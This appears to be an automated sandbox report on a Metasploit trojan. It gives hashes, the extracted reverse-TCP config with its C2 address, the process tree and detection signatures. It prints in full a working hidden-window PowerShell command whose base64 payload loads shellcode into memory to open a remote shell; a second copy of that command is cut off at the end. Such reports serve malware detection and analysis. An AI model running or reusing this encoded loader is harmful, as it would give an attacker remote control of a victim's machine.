metasploit | cfb5f740f662cd134e5a114a9f041a0c320fba850b48874ff1d2c23ca6be3fb5

General

Target

cfb5f740f662cd134e5a114a9f041a0c320fba850b48874ff1d2c23ca6be3fb5.exe
Size

17KB
MD5

b89b02e73b9191bbae636a043a1bc765
SHA1

d82d93d0d526b5dd36515c493a4c606ccaf3c787
SHA256

cfb5f740f662cd134e5a114a9f041a0c320fba850b48874ff1d2c23ca6be3fb5
SHA512

2dc14042e1533cd1f301665f8924c63df8cae5ce6b7d36afbe14ea755f913c84664a6f75b1ef82bb294f0b701e167b78cdb8129b6f3038cf5e87cb9bf44eb023
SSDEEP

384:YKwAXXwpskBwiRtj8cgYI90TumDI2cl1caXU0cYulkXwJtb9jv:BXXXKHBxRtj8c6Ccl1caXFcoXwJtb9jv

Score

10^/10

metasploit backdoor execution trojan

Malware Config

Extracted

Family

metasploit

Version

encoder/shikata_ga_nai

Extracted

Family

metasploit

Version

windows/reverse_tcp

C2

192.168.12.128:5544

Signatures

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

2892 powershell.exe
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exepowershell.exe

pid process

2892 powershell.exe
2576 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 2892 powershell.exe
Token: SeDebugPrivilege 2576 powershell.exe

pid	process
2892	powershell.exe

pid	process
2892	powershell.exe
2576	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2892	powershell.exe
Token: SeDebugPrivilege	2576	powershell.exe

Suspicious use of WriteProcessMemory 18 IoCs

Processes:

cfb5f740f662cd134e5a114a9f041a0c320fba850b48874ff1d2c23ca6be3fb5.execmd.exepowershell.exepowershell.execsc.exe

description	pid	process	target process
PID 2136 wrote to memory of 2880	2136	cfb5f740f662cd134e5a114a9f041a0c320fba850b48874ff1d2c23ca6be3fb5.exe	cmd.exe
PID 2136 wrote to memory of 2880	2136	cfb5f740f662cd134e5a114a9f041a0c320fba850b48874ff1d2c23ca6be3fb5.exe	cmd.exe
PID 2136 wrote to memory of 2880	2136	cfb5f740f662cd134e5a114a9f041a0c320fba850b48874ff1d2c23ca6be3fb5.exe	cmd.exe
PID 2880 wrote to memory of 2892	2880	cmd.exe	powershell.exe
PID 2880 wrote to memory of 2892	2880	cmd.exe	powershell.exe
PID 2880 wrote to memory of 2892	2880	cmd.exe	powershell.exe
PID 2892 wrote to memory of 2576	2892	powershell.exe	powershell.exe
PID 2892 wrote to memory of 2576	2892	powershell.exe	powershell.exe
PID 2892 wrote to memory of 2576	2892	powershell.exe	powershell.exe
PID 2892 wrote to memory of 2576	2892	powershell.exe	powershell.exe
PID 2576 wrote to memory of 2704	2576	powershell.exe	csc.exe
PID 2576 wrote to memory of 2704	2576	powershell.exe	csc.exe
PID 2576 wrote to memory of 2704	2576	powershell.exe	csc.exe
PID 2576 wrote to memory of 2704	2576	powershell.exe	csc.exe
PID 2704 wrote to memory of 2828	2704	csc.exe	cvtres.exe
PID 2704 wrote to memory of 2828	2704	csc.exe	cvtres.exe
PID 2704 wrote to memory of 2828	2704	csc.exe	cvtres.exe
PID 2704 wrote to memory of 2828	2704	csc.exe	cvtres.exe

C:\Users\Admin\AppData\Local\Temp\cfb5f740f662cd134e5a114a9f041a0c320fba850b48874ff1d2c23ca6be3fb5.exe
"C:\Users\Admin\AppData\Local\Temp\cfb5f740f662cd134e5a114a9f041a0c320fba850b48874ff1d2c23ca6be3fb5.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2136

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -window hidden -EncodedCommand JAA2AEUAWQAgAD0AIAAnACQAUAB5AEcAIAA9ACAAJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAUAB5AEcAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAZABhACwAMAB4AGMANQAsADAAeABiAGEALAAwAHgANAA4ACwAMAB4AGQAMQAsADAAeABmAGYALAAwAHgAOQA2ACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeAA1AGUALAAwAHgAMgBiACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANABiACwAMAB4ADMAMQAsADAAeAA1ADYALAAwAHgAMQA3ACwAMAB4ADgAMwAsADAAeABlAGUALAAwAHgAZgBjACwAMAB4ADAAMwAsADAAeAAxAGUALAAwAHgAYwAyACwAMAB4ADEAZAAsADAAeAA2ADMALAAwAHgANgAyACwAMAB4ADAAYwAsADAAeAA2AGUALAAwAHgAOABjACwAMAB4ADkAYQAsADAAeABjAGQALAAwAHgAMQAxACwAMAB4ADAANAAsADAAeAA3AGYALAAwAHgAZgBjACwAMAB4ADAAMwAsADAAeAA3ADIALAAwAHgAZgA0ACwAMAB4AGEAZAAsADAAeAA5ADMALAAwAHgAZgAwACwAMAB4ADUAOAAsADAAeAA1AGUALAAwAHgANQBmACwAMAB4ADUANAAsADAAeAA0ADgALAAwAHgAZAA1ACwAMAB4ADIAZAAsADAAeAA3ADEALAAwAHgANAAxACwAMAB4ADEANgAsADAAeABkAGUALAAwAHgAMwA2ACwAMAB4AGUAYgAsADAAeABjAGUALAAwAHgAZAAwACwAMAB4AGYAOAAsADAAeAA0ADcALAAwAHgAMwAyACwAMAB4ADcAMgAsADAAeAA4ADUALAAwAHgAOQA1ACwAMAB4ADYANwAsADAAeAA1ADQALAAwAHgAYgA0ACwAMAB4ADUANgAsADAAeAA3AGEALAAwAHgAOQA1ACwAMAB4AGYAMQAsADAAeAAyADEALAAwAHgAZgAwACwAMAB4ADcAYQAsADAAeABhAGYALAAwAHgAMwBhACwAMAB4AGEAOAAsADAAeAA5ADQALAAwAHgAMAA3ACwAMAB4AGIANwAsADAAeAAwAGYALAAwAHgAYQA5ACwAMAB4AGEANgAsADAAeAAxADcALAAwAHgAMAA0ACwAMAB4ADkAMQAsADAAeABkADAALAAwAHgAMQAyACwAMAB4AGQAYgAsADAAeAA2ADYALAAwAHgANgBkACwAMAB4ADEAZAAsADAAeAAwAGMALAAwAHgAMABkACwAMAB4ADMANQAsADAAeAAzAGQALAAwAHgAYQBkACwAMAB4AGMAMQAsADAAeAA0AGQALAAwAHgANwA1ACwAMAB4AGIANQAsADAAeABiADUALAAwAHgAZAA0ACwAMAB4ADQAYwAsADAAeABiADEALAAwAHgAMAA5ACwAMAB4ADkAZQAsADAAeAA3AGYALAAwAHgAYwA1ACwAMAB4AGYAOQAsADAAeAAxADQALAAwAHgAZgA0ACwAMAB4ADMAOAAsADAAeAAyADgALAAwAHgANgA1ACwAMAB4AGMAYQAsADAAeABmAGEALAAwAHgAMQBiACwAMAB4ADgAYgAsADAAeAA2ADYALAAwAHgAZgBkACwAMAB4ADYANAAsADAAeABhAGMALAAwAHgAOQA2ACwAMAB4ADgAYgAsADAAeAA5AGUALAAwAHgAYwBlACwAMAB4ADIAYgAsADAAeAA4AGMALAAwAHgANgA0ACwAMAB4AGEAYwAsADAAeABmADcALAAwAHgAMQA5ACwAMAB4ADcAYgAsADAAeAAxADYALAAwAHgANwBjACwAMAB4AGIAOQAsADAAeAA1AGYALAAwAHgAYQA2ACwAMAB4ADUAMQAsADAAeAA1AGMALAAwAHgAMgBiACwAMAB4AGEANAAsADAAeAAxAGUALAAwAHgAMgBhACwAMAB4ADcAMwAsADAAeABhADkALAAwAHgAYQAxACwAMAB4AGYAZgAsADAAeAAwAGYALAAwAHgAZAA1ACwAMAB4ADIAYQAsADAAeABmAGUALAAwAHgAZABmACwAMAB4ADUAZgAsADAAeAA2ADgALAAwAHgAMgA1ACwAMAB4AGMANAAsADAAeAAwADQALAAwAHgAMgBiACwAMAB4ADQANAAsADAAeAA1AGQALAAwAHgAZQAxACwAMAB4ADkAYQAsADAAeAA3ADkALAAwAHgAYgBkACwAMAB4ADQAZAAsADAAeAA0ADMALAAwAHgAZABjACwAMAB4AGIANQAsADAAeAA3AGMALAAwAHgAOQAyACwAMAB4ADYAMAAsADAAeAAzADYALAAwAHgANwBmACwAMAB4ADkAYgAsADAAeAAzAGMALAAwAHgAYQAxACwAMAB4AGIAMwAsADAAeAA1ADEALAAwAHgAYgBmACwAMAB4ADMAMQAsADAAeABkAGMALAAwAHgAZQAyACwAMAB4AGMAYwAsADAAeAAwADMALAAwAHgANAAzACwAMAB4ADUAOAAsADAAeAA1AGIALAAwAHgAMgA4ACwAMAB4ADAAYwAsADAAeAA0ADYALAAwAHgAOQBjACwAMAB4ADMAOQAsADAAeAAxAGEALAAwAHgANwA5ACwAMAB4ADcAMgAsADAAeAA4ADEALAAwAHgANABiACwAMAB4ADgANAAsADAAeAA3ADMALAAwAHgAZgAyACwAMAB4ADQAMgAsADAAeAA0ADIALAAwAHgAMgA3ACwAMAB4AGEAMgAsADAAeABmAGMALAAwAHgANgAzACwAMAB4ADQAOAAsADAAeAAyADkALAAwAHgAZgBkACwAMAB4ADgAYwAsADAAeAA5AGQALAAwAHgAYwA0ACwAMAB4AGYANwAsADAAeAAxAGEALAAwAHgAZABlACwAMAB4AGIAMQAsADAAeAAwADQALAAwAHgANQBhACwAMAB4AGIANgAsADAAeABjADMALAAwAHgAMQA0ACwAMAB4ADQAZgAsADAAeABlAGYALAAwAHgANABkACwAMAB4AGYAMgAsADAAeAAzAGYALAAwAHgAYgBmACwAMAB4ADEAZAAsADAAeABhAGIALAAwAHgAZgBmACwAMAB4ADYAZgAsADAAeABkAGUALAAwAHgAMQBiACwAMAB4ADkANwAsADAAeAA2ADUALAAwAHgAZAAxACwAMAB4ADQANAAsADAAeAA4ADcALAAwAHgAOAA1ACwAMAB4ADMAYgAsADAAeABlAGQALAAwAHgAMgBkACwAMAB4ADYAYQAsADAAeAA5ADIALAAwAHgANAA1ACwAMAB4AGQAOQAsADAAeAAxADMALAAwAHgAYgBmACwAMAB4ADEAZQAsADAAeAA3ADgALAAwAHgAZABiACwAMAB4ADEANQAsADAAeAA1AGIALAAwAHgAYgBhACwAMAB4ADUANwAsADAAeAA5AGEALAAwAHgAOQBiACwAMAB4ADcANAAsADAAeAA5ADAALAAwAHgAZAA3ACwAMAB4ADgAZgAsADAAeABlADAALAAwAHgANQAwACwAMAB4AGEAMgAsADAAeABmADIALAAwAHgAYQA2ACwAMAB4ADYAZgAsADAAeAAxADgALAAwAHgAOQA4ACwAMAB4ADQANgAsADAAeABmAGEALAAwAHgAYQA3ACwAMAB4ADAAYgAsADAAeAAxADEALAAwAHgAOQAyACwAMAB4AGEANQAsADAAeAA2AGEALAAwAHgANQA1ACwAMAB4ADMAZAAsADAAeAA1ADUALAAwAHgANQA5ACwAMAB4AGUAZQAsADAAeABmADQALAAwAHgAYwAzACwAMAB4ADIAMgAsADAAeAA5ADgALAAwAHgAZgA4ACwAMAB4ADAAMwAsADAAeABhADMALAAwAHgANQA4ACwAMAB4AGEAZgAsADAAeAA0ADkALAAwAHgAYQAzACwAMAB4ADMAMAAsADAAeAAxADcALAAwAHgAMgBhACwAMAB4AGYAMAAsADAAeAAyADUALAAwAHgANQA4ACwAMAB4AGUANwAsADAAeAA2ADQALAAwAHgAZgA2ACwAMAB4AGMAZAAsADAAeAAwADgALAAwAHgAZABkACwAMAB4AGEAYgAsADAAeAA0ADYALAAwAHgANgAxACwAMAB4AGUAMwAsADAAeAA5ADIALAAwAHgAYQAxACwAMAB4ADIAZQAsADAAeAAxAGMALAAwAHgAZgAxACwAMAB4ADMAMwAsADAAeAAxADIALAAwAHgAYwBiACwAMAB4ADMAZgAsADAAeAA0ADYALAAwAHgANwBhACwAMAB4AGMAZgA7ACQAZwAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJAB6AC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAAwACkAewAkAGcAIAA9ACAAJAB6AC4ATABlAG4AZwB0AGgAfQA7ACQASABsAHAAVwA9ACQAdwA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADAALAAkAGcALAAwAHgANAAwACkAOwBmAG8AcgAgACgAJABpAD0AMAA7ACQAaQAgAC0AbABlACAAKAAkAHoALgBMAGUAbgBnAHQAaAAtADEAKQA7ACQAaQArACsAKQAgAHsAJAB3ADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQASABsAHAAVwAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQASABsAHAAVwAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAOwApAHsAUwB0AGEAcgB0AC0AcwBsAGUAZQBwACAANgAwAH0AOwAnADsAJABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkADYARQBZACkAKQA7ACQAUQBNAHAAVwAgAD0AIAAiAC0AZQBuAGMAIAAiADsAaQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA4ACkAewAkAEcAMQBoAGgAIAA9ACAAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAIAArACAAIgBcAHMAeQBzAHcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsACIAOwBpAGUAeAAgACIAJgAgACQARwAxAGgAaAAgACQAUQBNAHAAVwAgACQAZQAiAH0AZQBsAHMAZQB7ADsAaQBlAHgAIAAiACYAIABwAG8AdwBlAHIAcwBoAGUAbABsACAAJABRAE0AcABXACAAJABlACIAOwB9AA==
2⤵
- Suspicious use of WriteProcessMemory
PID:2880

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -window hidden -EncodedCommand JAA2AEUAWQAgAD0AIAAnACQAUAB5AEcAIAA9ACAAJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAUAB5AEcAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAZABhACwAMAB4AGMANQAsADAAeABiAGEALAAwAHgANAA4ACwAMAB4AGQAMQAsADAAeABmAGYALAAwAHgAOQA2ACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeAA1AGUALAAwAHgAMgBiACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANABiACwAMAB4ADMAMQAsADAAeAA1ADYALAAwAHgAMQA3ACwAMAB4ADgAMwAsADAAeABlAGUALAAwAHgAZgBjACwAMAB4ADAAMwAsADAAeAAxAGUALAAwAHgAYwAyACwAMAB4ADEAZAAsADAAeAA2ADMALAAwAHgANgAyACwAMAB4ADAAYwAsADAAeAA2AGUALAAwAHgAOABjACwAMAB4ADkAYQAsADAAeABjAGQALAAwAHgAMQAxACwAMAB4ADAANAAsADAAeAA3AGYALAAwAHgAZgBjACwAMAB4ADAAMwAsADAAeAA3ADIALAAwAHgAZgA0ACwAMAB4AGEAZAAsADAAeAA5ADMALAAwAHgAZgAwACwAMAB4ADUAOAAsADAAeAA1AGUALAAwAHgANQBmACwAMAB4ADUANAAsADAAeAA0ADgALAAwAHgAZAA1ACwAMAB4ADIAZAAsADAAeAA3ADEALAAwAHgANAAxACwAMAB4ADEANgAsADAAeABkAGUALAAwAHgAMwA2ACwAMAB4AGUAYgAsADAAeABjAGUALAAwAHgAZAAwACwAMAB4AGYAOAAsADAAeAA0ADcALAAwAHgAMwAyACwAMAB4ADcAMgAsADAAeAA4ADUALAAwAHgAOQA1ACwAMAB4ADYANwAsADAAeAA1ADQALAAwAHgAYgA0ACwAMAB4ADUANgAsADAAeAA3AGEALAAwAHgAOQA1ACwAMAB4AGYAMQAsADAAeAAyADEALAAwAHgAZgAwACwAMAB4ADcAYQAsADAAeABhAGYALAAwAHgAMwBhACwAMAB4AGEAOAAsADAAeAA5ADQALAAwAHgAMAA3ACwAMAB4AGIANwAsADAAeAAwAGYALAAwAHgAYQA5ACwAMAB4AGEANgAsADAAeAAxADcALAAwAHgAMAA0ACwAMAB4ADkAMQAsADAAeABkADAALAAwAHgAMQAyACwAMAB4AGQAYgAsADAAeAA2ADYALAAwAHgANgBkACwAMAB4ADEAZAAsADAAeAAwAGMALAAwAHgAMABkACwAMAB4ADMANQAsADAAeAAzAGQALAAwAHgAYQBkACwAMAB4AGMAMQAsADAAeAA0AGQALAAwAHgANwA1ACwAMAB4AGIANQAsADAAeABiADUALAAwAHgAZAA0ACwAMAB4ADQAYwAsADAAeABiADEALAAwAHgAMAA5ACwAMAB4ADkAZQAsADAAeAA3AGYALAAwAHgAYwA1ACwAMAB4AGYAOQAsADAAeAAxADQALAAwAHgAZgA0ACwAMAB4ADMAOAAsADAAeAAyADgALAAwAHgANgA1ACwAMAB4AGMAYQAsADAAeABmAGEALAAwAHgAMQBiACwAMAB4ADgAYgAsADAAeAA2ADYALAAwAHgAZgBkACwAMAB4ADYANAAsADAAeABhAGMALAAwAHgAOQA2ACwAMAB4ADgAYgAsADAAeAA5AGUALAAwAHgAYwBlACwAMAB4ADIAYgAsADAAeAA4AGMALAAwAHgANgA0ACwAMAB4AGEAYwAsADAAeABmADcALAAwAHgAMQA5ACwAMAB4ADcAYgAsADAAeAAxADYALAAwAHgANwBjACwAMAB4AGIAOQAsADAAeAA1AGYALAAwAHgAYQA2ACwAMAB4ADUAMQAsADAAeAA1AGMALAAwAHgAMgBiACwAMAB4AGEANAAsADAAeAAxAGUALAAwAHgAMgBhACwAMAB4ADcAMwAsADAAeABhADkALAAwAHgAYQAxACwAMAB4AGYAZgAsADAAeAAwAGYALAAwAHgAZAA1ACwAMAB4ADIAYQAsADAAeABmAGUALAAwAHgAZABmACwAMAB4ADUAZgAsADAAeAA2ADgALAAwAHgAMgA1ACwAMAB4AGMANAAsADAAeAAwADQALAAwAHgAMgBiACwAMAB4ADQANAAsADAAeAA1AGQALAAwAHgAZQAxACwAMAB4ADkAYQAsADAAeAA3ADkALAAwAHgAYgBkACwAMAB4ADQAZAAsADAAeAA0ADMALAAwAHgAZABjACwAMAB4AGIANQAsADAAeAA3AGMALAAwAHgAOQAyACwAMAB4ADYAMAAsADAAeAAzADYALAAwAHgANwBmACwAMAB4ADkAYgAsADAAeAAzAGMALAAwAHgAYQAxACwAMAB4AGIAMwAsADAAeAA1ADEALAAwAHgAYgBmACwAMAB4ADMAMQAsADAAeABkAGMALAAwAHgAZQAyACwAMAB4AGMAYwAsADAAeAAwADMALAAwAHgANAAzACwAMAB4ADUAOAAsADAAeAA1AGIALAAwAHgAMgA4ACwAMAB4ADAAYwAsADAAeAA0ADYALAAwAHgAOQBjACwAMAB4ADMAOQAsADAAeAAxAGEALAAwAHgANwA5ACwAMAB4ADcAMgAsADAAeAA4ADEALAAwAHgANABiACwAMAB4ADgANAAsADAAeAA3ADMALAAwAHgAZgAyACwAMAB4ADQAMgAsADAAeAA0ADIALAAwAHgAMgA3ACwAMAB4AGEAMgAsADAAeABmAGMALAAwAHgANgAzACwAMAB4ADQAOAAsADAAeAAyADkALAAwAHgAZgBkACwAMAB4ADgAYwAsADAAeAA5AGQALAAwAHgAYwA0ACwAMAB4AGYANwAsADAAeAAxAGEALAAwAHgAZABlACwAMAB4AGIAMQAsADAAeAAwADQALAAwAHgANQBhACwAMAB4AGIANgAsADAAeABjADMALAAwAHgAMQA0ACwAMAB4ADQAZgAsADAAeABlAGYALAAwAHgANABkACwAMAB4AGYAMgAsADAAeAAzAGYALAAwAHgAYgBmACwAMAB4ADEAZAAsADAAeABhAGIALAAwAHgAZgBmACwAMAB4ADYAZgAsADAAeABkAGUALAAwAHgAMQBiACwAMAB4ADkANwAsADAAeAA2ADUALAAwAHgAZAAxACwAMAB4ADQANAAsADAAeAA4ADcALAAwAHgAOAA1ACwAMAB4ADMAYgAsADAAeABlAGQALAAwAHgAMgBkACwAMAB4ADYAYQAsADAAeAA5ADIALAAwAHgANAA1ACwAMAB4AGQAOQAsADAAeAAxADMALAAwAHgAYgBmACwAMAB4ADEAZQAsADAAeAA3ADgALAAwAHgAZABiACwAMAB4ADEANQAsADAAeAA1AGIALAAwAHgAYgBhACwAMAB4ADUANwAsADAAeAA5AGEALAAwAHgAOQBiACwAMAB4ADcANAAsADAAeAA5ADAALAAwAHgAZAA3ACwAMAB4ADgAZgAsADAAeABlADAALAAwAHgANQAwACwAMAB4AGEAMgAsADAAeABmADIALAAwAHgAYQA2ACwAMAB4ADYAZgAsADAAeAAxADgALAAwAHgAOQA4ACwAMAB4ADQANgAsADAAeABmAGEALAAwAHgAYQA3ACwAMAB4ADAAYgAsADAAeAAxADEALAAwAHgAOQAyACwAMAB4AGEANQAsADAAeAA2AGEALAAwAHgANQA1ACwAMAB4ADMAZAAsADAAeAA1ADUALAAwAHgANQA5ACwAMAB4AGUAZQAsADAAeABmADQALAAwAHgAYwAzACwAMAB4ADIAMgAsADAAeAA5ADgALAAwAHgAZgA4ACwAMAB4ADAAMwAsADAAeABhADMALAAwAHgANQA4ACwAMAB4AGEAZgAsADAAeAA0ADkALAAwAHgAYQAzACwAMAB4ADMAMAAsADAAeAAxADcALAAwAHgAMgBhACwAMAB4AGYAMAAsADAAeAAyADUALAAwAHgANQA4ACwAMAB4AGUANwAsADAAeAA2ADQALAAwAHgAZgA2ACwAMAB4AGMAZAAsADAAeAAwADgALAAwAHgAZABkACwAMAB4AGEAYgAsADAAeAA0ADYALAAwAHgANgAxACwAMAB4AGUAMwAsADAAeAA5ADIALAAwAHgAYQAxACwAMAB4ADIAZQAsADAAeAAxAGMALAAwAHgAZgAxACwAMAB4ADMAMwAsADAAeAAxADIALAAwAHgAYwBiACwAMAB4ADMAZgAsADAAeAA0ADYALAAwAHgANwBhACwAMAB4AGMAZgA7ACQAZwAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJAB6AC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAAwACkAewAkAGcAIAA9ACAAJAB6AC4ATABlAG4AZwB0AGgAfQA7ACQASABsAHAAVwA9ACQAdwA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADAALAAkAGcALAAwAHgANAAwACkAOwBmAG8AcgAgACgAJABpAD0AMAA7ACQAaQAgAC0AbABlACAAKAAkAHoALgBMAGUAbgBnAHQAaAAtADEAKQA7ACQAaQArACsAKQAgAHsAJAB3ADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQASABsAHAAVwAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQASABsAHAAVwAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAOwApAHsAUwB0AGEAcgB0AC0AcwBsAGUAZQBwACAANgAwAH0AOwAnADsAJABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkADYARQBZACkAKQA7ACQAUQBNAHAAVwAgAD0AIAAiAC0AZQBuAGMAIAAiADsAaQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA4ACkAewAkAEcAMQBoAGgAIAA9ACAAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAIAArACAAIgBcAHMAeQBzAHcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsACIAOwBpAGUAeAAgACIAJgAgACQARwAxAGgAaAAg